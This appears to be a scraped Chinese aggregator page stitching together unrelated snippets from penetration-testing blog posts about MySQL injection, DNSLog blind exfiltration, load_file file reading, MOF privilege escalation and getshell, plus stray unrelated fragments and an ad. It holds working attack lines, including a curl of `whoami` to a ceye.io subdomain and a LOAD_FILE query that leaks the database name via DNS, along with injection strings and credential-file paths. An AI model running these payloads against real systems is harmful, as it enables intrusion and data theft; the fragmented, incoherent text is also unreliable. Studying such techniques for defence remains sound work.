当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。
这一篇的内容主要讲的是关于利用数据库服务来进行提权操作,今天的主要内容是利用mysql、mssql进行提权。
作为一只审计菜鸡,在前台没发现什么大漏洞,只在后台找到两个,不过代码审计过程还是很香的。接下来就掰扯一下菜鸡的审计过程。另外分享的两个漏洞已经通报给 CNVD。
只要我们输入任何一个评论,他就会让我们进行登录, 我们可以通过他的文字提示,发现少了三位,一般我们都会上数字
union语句是一下可以查询两条语句的用法,需要注意的是前一句查询语句与后一句查询语句中查询的数量需要保持一直,否则会报错。
周末一个人打了中科院的XNUCA(小伙伴打着打着就不知道哪里去了…),由于比较弱,最后也只能打到20多名,稍微整理下wp吧…
phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本中修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。
DNS: 域名解析IP , 用户在浏览器输入一个域名, 靠DNS服务解析域名的真实IP, 访问服务器上相应的服务
在渗透测试当中,当我们遇到没有回显的漏洞是非常难以利用,因为我们无从得知存不存在漏洞,另外是我们无法得知漏洞执行的结果。因此,针对无回显漏洞,我们可以通过使用DNSLog来进行回显,DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。
在针对网站渗透中,很多都是跟 MySQL 数据库有关,各种 MySQL 注入、MySQL 提权、MySQL 数据库 Root 账号 webshell 获取等,但没有一个对 MySQL 数据库渗透较为全面的总结。
Getshell分为进管理员后台Getshell和不进后台Getshell,本文主要总结常见进后台Getshell和部分。
MySQL读取和写入文件在ctf或者awd中,常用于读取flag或者写入一个一句话木马,通过特定函数将其写入
在Msql注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件
在渗透测试中,提升自己的权限是经常遇到的问题,往往在渗透中最容易获取的权限就是一个webshell,如果网站是架设在Windows系统上的,这时就可能遇到这样的问题,还有一种情况是在做横向渗透的时候,收集到一些可以远程连接桌面的帐号,这是也需要,在实际的渗透中有很多的地方会需要这个操作,这个系列就主要介绍各种提权的方式。
在 mysql 中,分号 代表一个查询语句的结束,所以我们可以用分号在一行里拼接多个查询语句
Mysql的服务没有降权,并且需要获取Mysql root账号密码 使用net user命令查看系统当前帐号,如果出现Mysql这类用户,则系统可能进行了降权
实现代码如下所示: 1.主页面file_zip.php <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>文件管理</title> <script src="bootstrap/js/jquery-1.11.2.min.js"></script> </head> <style> *{ margin:0px auto; padding:0px} #wai{ width:800px;} .list{ width:50%; height:35p
2.建一个名字为 load_file.lua (XXXX.lua)XXXX随意
我们可以通过前期的渗透手段和分析得知目标网站某处存在SQL注入漏洞;于是我们就可以利用SQL的文件读取的特性来读取目标系统中的某个文件的内容
有的企业在安装MySQL时用的是默认选项,由此造成其数据不安全,且服务器也面临被入侵的风险,并有可能在短时间内就出现性能问题。本文将提供保障MySQL安全的最佳方法。 MySQL数据库一贯以高性能、高可性和易用性著称,它已经成为世界上最流行的开源数据库。大量的个人、WEB开发者、大型公司等都在其网站、关键系统、软件包中广泛使用MySQL数据库。 通常,许多企业在部署一种产品时,安全性常常得不到应有的重视。企业最关心的是使其可以尽快地运行,企业由此也可以尽快赢利。 但有的企业在安装MySQL时用的
在一个应用中,数据的安全无疑是最重要的。数据的最终归宿都是数据库,因此如何保证数据库不被恶意攻击者入侵是一项重要且严肃的问题!
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
http://www.cnblogs.com/chenny7/p/4253337.html
②.匹配字段 and 1=1 union select 1,2,3,4,5…….n/*
Extractvalue:对xml文档进行查询 语法:extractvalue(文档类型,xpath路径)
需要目标机器时windows系统 DnsLog盲注 DnsLog盲注原理 📷 📷 Dnslog平台:http://ceye.io/ 📷 http://ceye.io/profile curl mzq83x.ceye.io 📷 curl `whoami`.mzq83x.ceye.io 📷 📷 📷 📷 DnsLog盲注方法 📷 核心语法: SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc')); s
SQL 注入就是指,在输入的字符串中注入 SQL 语句,如果应用相信用户的输入而对输入的字符串没进行任何的过滤处理,那么这些注入进去的 SQL 语句就会被数据库误认为是正常的 SQL 语句而被执行。
提权Webshell:尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取shell。
MariaDB [sec]> select /*!5555,name*/ id from user;
上面的命令每1000行增加一行select sleep(1);, 这样执行频率是1k/s
供应商:https://www.sourcecodester.com/users/tips23
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。
关注着CNVD的漏洞通报,发现ZZCMS 7.1版本存在一个任意文件读取的漏洞通告,遂尝试复现一波。先说一下漏洞利用,权限为管理员才行在有管理员权限后,才可以利用查看日志的方式,读取到任意文件内容,关键的函数是load_file()0x00 漏洞利用条件管理员权限后台管理目录后台数据库为mysql管理员权限,emmm~相信大家已经可以通过很多方式拿到后台管理
例如:我写入一菜刀一句话小马 文件 到 C:\phpStudy\WWW\123.php 目录下
1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以system权限执行一次,所以,只要我们将我们先要做的事通过代码存储到这个mof文件中,就可以实现权限提升。
在我们渗透测试过程中,信息搜集无非是最重要的环节!在有的时候我们需要知道网站的绝对路径,下面我总结了几点查看网站路径的方法
5 连接到mysql 找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符
当我们尝试进行注入的时候,发现有waf,当出现有union select的时候就会被拦截
目录 0x00 前言 0x01 漏洞分析--代码审计 0x02 漏洞利用 1.sql注入出后台账号、密码、安全码 2.二次漏洞利用:sql注入+csrf getshell 0x03 漏洞修复 -----从sql注入到csrf最后getshell---- 0x00 前言 CNVD公布日期2017-08-15 http://www.cnvd.org.cn/flaw/show/CNVD-2017-13891 漏洞影响版本 appcms <=2.0.101 APPCMS官方站点:http://www.ap
端口情况只开放了常见的80端口,发现是西部数码主机,主机商自带的cdn,兼具这一些waf的功能。 通过社工的手段拿到了一个前台的账户密码: `user:18888xxxxxx` `pass:xxxxx
看起来没有什么特别的,就是一个可以提交信息的页面。查看响应报文也没有什么提示,但是在网页注释里有东西。
Pnig0s p.s: ***一韩国站,遭遇Mysql4,好在有FILE权限只能批量LOAD_FILE路径,为了避免繁重的工作量写了这个脚本,字典文件名为dic.txt路径一行一个,因为环境不同,此脚本并非通用,稍作改动即可。复制代码请务必在普通IE下复制
工作中,当你需要对某个文件夹或多个文件夹内的大量类似文件做相同操作(增删改查)时,你还在拼命加班做一个没有感情的工具人嘛?掌握以下几个操作,瞬间完成任务,然后你就可以摸鱼去了。
load_file和into outfile用户必须有FILE权限,并且还需要知道网站的绝对路径
多数CMS都采用过滤危险字符的方式,例如,用正则表达式匹配union、sleep、load_file等关键字。如果匹配到,则退出程序。例如,80sec的防注入代码如下:
原文出处: freenik@Jianshu 将 外部数据导入(import)数据库是在数据库应用中一个很常见的需求。其实这就是在数据的管理和操作中的ETL (Extract, transform,
c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码
根据作者的描述,他一共放置了4个flag,全部找到即通过,废话不多说,直接开干!
这个问题已经是去年提出的了,之前也看到过,在 CTF 题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。
领取专属 10元无门槛券
手把手带您无忧上云